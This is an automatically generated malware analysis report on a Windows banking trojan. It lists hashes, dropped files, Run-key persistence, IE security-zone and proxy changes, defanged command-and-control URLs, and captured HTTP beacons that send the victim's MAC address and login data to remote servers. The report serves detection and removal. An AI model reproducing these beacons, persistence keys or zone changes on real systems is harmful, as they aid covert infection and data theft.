Trojan.GenericKD.2249578 (B) (Emsisoft), Trojan.GenericKD.2249578 (AdAware), GenericEmailWorm.YR, TrojanFlyStudio.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 07fd8bc3e2c460e17ad8a37c2f7dcf71
SHA1: f96243e4be9968625ff1977543681821967ab1d8
SHA256: 2494356cdf0a21950b75e365f9480cede5f3a1bd3b5a760b89bb935558118223
SSDeep: 49152:KNPDqXMXmf1UGXkVaW4mxDulVXN6kPof:DcXz2kVafqulV96kPof
Size: 2383872 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: StdLib
Created at: 2015-03-15 10:03:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:348
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
C:\UUWiseHelper.dll (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
Registry activity
The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData]
"UserFilter" = "41 1F 00 00 53 08 AD BA 01 00 00 00 32 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU]
"alipay_hwnd" = "1638622"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 9F 70 B9 B5 4D F4 CA 48 79 50 12 B9 FF D9 F1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"EnableChromeTab" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| afd14de763f7c540e686afdc55281039 | c:\UUWiseHelper.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:348
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
C:\UUWiseHelper.dll (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 1025359 | 1028096 | 4.5629 | f7279607e8fc344535125fc61a1364a1 |
| .rdata | 1032192 | 1215612 | 1216512 | 4.25382 | d54b02a3965caadaa04bfcc027da235c |
| .data | 2248704 | 302730 | 98304 | 3.74499 | d5beb10cdb7ac993a77fef1745a94747 |
| .rsrc | 2551808 | 36416 | 36864 | 3.58565 | 2110b7b5888adc8dda4dc0f042f1526e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://174.139.10.150/update/check.php?check=1.3 | |
| hxxp://s1.uuwise.com/Api/config.aspx | 116.255.181.152 |
| hxxp://lb.uudama.com/Api/VerifyAPIFile.aspx | 113.107.181.46 |
| hxxp://lb.uudama.com/Api/UserLogin.aspx | 113.107.181.46 |
| hxxp://lb.uudama.com/Api/UserPoint.aspx | 113.107.181.46 |
| hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=3032273022523032253032133022603032461.3&gsd=303216303232302277303213303200302274 | 174.139.10.150 |
| hxxp://www.api666.com/test.txt | 174.139.10.150 |
| hxxp://www.api666.com/s_start.php?mac=00-0C-29-8E-22-D8 | 174.139.10.150 |
| hxxp://www.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8 | 174.139.10.150 |
| hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ | 174.139.10.150 |
| hxxp://www.api666.com/update/check.php?check=1.3 | 174.139.10.150 |
| 1.cn.pool.ntp.org | 202.118.1.81 |
| cn.pool.ntp.org | 202.112.31.197 |
| www.baidu.com | 180.76.3.151 |
| 0.cn.pool.ntp.org | 202.112.10.36 |
| 2.cn.pool.ntp.org | 202.112.31.197 |
| 3.cn.pool.ntp.org | 202.112.31.197 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /Api/VerifyAPIFile.aspx HTTP/1.1
User-Agent: VersionClient
Cache-Control: no-cache
Accept: */*
TTL: 1427902891209
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 411
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Info"
449AA4D5026EF9F69DABB21D88F3E48D5BF5C582E09500EA5EB6004963E12D064C7056FFCD9F6D4A3234818CBBD7F9BEA51ECD2143FD05AC13B22AF4A008E145D45497F0D4AA397BAD5D995D49C9FBE1F2D5A3BFF89CBB65
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 96
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=errw3c454axfofnjx0vt5i45; path=/; HttpOnly
Cache-Control: private
24664F2554DDE337A2836DF3C253569DF6F31FF43DF8EA44FC6D7F086349C98773530F5133CD51B37DDD4C3725BB6ACB....
POST /Api/UserLogin.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902895803
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 715
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="NAME"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="PASS"
EFF0F22544B04226BABA0D48195CB738
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
53F117A35BB9FB72B8794AD99C32C670DA1CE9477251DF95C3A439EA60D907977C5D06144FA4A75A0911A2CA163286F1DBB69B9831D6966145AF8B72BC088D99A76E37DC94FA128E
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 448
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=km2i1j55jei43rfrptpqqo2d; path=/; HttpOnly
Cache-Control: private
90FA3BD8B8F4C0FB5C8C0C32C99E75E8CFD80087C8E39FF35921E36C16F0E40851E73639FB007CC68C895BF5ABC12F4C90574383EC3C2402D3D229C4D6F72DA07E1167D21E09E155CF0AB2CAAC0B79BEF19A359F69A109126918A97FF79F775BBDC5C085FF09192A1C143AC6D27286E214D257F494D493CA2357972114F47C30AAE3CAF1CA680A9528E9769B368F781C150C0D4E3DF959459901F3BC40432FECDE44CBD76F905960801DB903F43EEA5A7D4F078F66E632BA753398903170661EC6262B45B85BFB3D8F49E38632FB12FC1B83EC57D18D8A550B505D6AC97E9A85....
POST /Api/UserPoint.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902896709
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1131
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"
0F9FA1A753ED4B73A5AAAFF1470CAD82
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
CFB6490440EC58A8583E7CCE45CAA1E2FF40F971D5749BFDA033170E3DECBFABE04F61FE852DD0A5BB5C8FD21537922932F6A929A2CBB8E9C849A8777BC146413DA9A57AED4B6A70C2EF34B7225167955D9A2AC387A33097DBEAA9A98E37A30061745AF70F74D6E9A107EF5ABB1C14AA8061ABD5E231927DAC73209B88E8D999D99BD62D160264101E259CE5CB006D2EFB6A9571F65D7D73273949874C7EB6893D40ABA2F0BD7E0EC04509C39CAFC3662562A4655CD99884AF04443C534A752E87AEE4CEAF5FA17EA65F8B5AEAE6B64E74D9D204637C3B39A51B4C2C42A9F9807FA744E0BC5026970F87949CBABA945796B024AE5F693B46391B82E4FDE81D3B58CD42BE323AEFFA5EAAD82EE3B539FC7CF0C7C0D4802A76
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10042
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=isbsanbcme1d0oayrfsbua45; path=/; HttpOnly
Cache-Control: private
B7C330AFD0695F577B7CF17F1949442F....
POST /Api/UserPoint.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902897100
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1163
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"
85AEC333149A4BDE89478991F6BF38DB
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
C184C9A78BFF61093CEF47F8371E5525D9745C83574220B9F02FD6BE1CBCB371FA9527D93AE5F4D522215FF69311C7440EC8D4D3869F10C6640109694F8594D9EAE5163999F2EDE275ED63A982B36EE7E399379FD2A9E96E8D0A54AC7187182C0855505F3E14E30C07E97D5F3BE8CB80DFF6F062E80B4BDEBB191A126027D811191EC6F3E62A2462CE7764282B6B47D6D2E2A5A206C4F750A093D2225CCB06D24118D02829B2AA44CFC7C66C81222AE3EA70CAB8131D822225932740430BD6D96635A0F952386B2BF8C928D1736FEAE5276056809B7C5E4438EB10F53D2E0949BB985FDEAC093ECADED90B5D1C82C93459F2A3A84120D11F1772869606E1C03624D1F4A7CB3811F54580D4050EBAC7D4DA6389ACCF0FB11EC9C78C550B026EDB7C148009C744338D
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10034
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0hnlrqaqa4bquqy5fov5fb55; path=/; HttpOnly
Cache-Control: private
FBD18BEAEAB719B13CB86C11C616EDA7..
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:26 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:56 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /update/check.php?check=1.3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.api666.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:11 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
POST /Api/config.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902888443
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 376
Host: s1.uuwise.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="HASH"
50FB130BCA1FFB4B2C642C8E94620915
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:45 GMT
Server: Microsoft-IIS/6.0
ServerV: 10035
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ls0cgemfccjrhfnhkldqov55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176
313030302C6C622E757564616D612E636F6D3A38303A3130312C7570622E7575776973652E636F6D3A38303A3130322C7570622E7575776973652E636F6D3A38303A3130332C7C307C39312E3230302E3135392E31333120..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
add..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_348:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t%SVh
t%SVh
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
UUWiseHelper.dll
UUWiseHelper.dll
ole32.dll
ole32.dll
user32.dll
user32.dll
OLEACC.DLL
OLEACC.DLL
kernel32.dll
kernel32.dll
wininet.dll
wininet.dll
uu_loginA
uu_loginA
yexingzhe|,|yexingzhe|,|wanbaolu_566@163.com\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
yexingzhe|,|yexingzhe|,|wanbaolu_566@163.com\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
VVV.baidu.com
VVV.baidu.com
32F1C86B-E64C-4EAF-8BC1-C142570008BC
32F1C86B-E64C-4EAF-8BC1-C142570008BC
\UUWiseHelper.dll
\UUWiseHelper.dll
@.reloc
@.reloc
SSSSh
SSSSh
ByScreen.JPG
ByScreen.JPG
operator
operator
GetProcessWindowStation
GetProcessWindowStation
E:\work\UUWiseHelper
E:\work\UUWiseHelper
\UUWiseHelper.pdb
\UUWiseHelper.pdb
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
urlmon.dll
urlmon.dll
dbghelp.dll
dbghelp.dll
gdiplus.dll
gdiplus.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
WS2_32.dll
WS2_32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
UUWiseHelper.DLL
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
uu_easyRecognizeUrlW
uu_loginW
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
uu_recognizeByCodeTypeAndUrlW
uu_reportError
uu_reportError
zcÃ
zcÃ
0(1,10141
0(1,10141
9 9
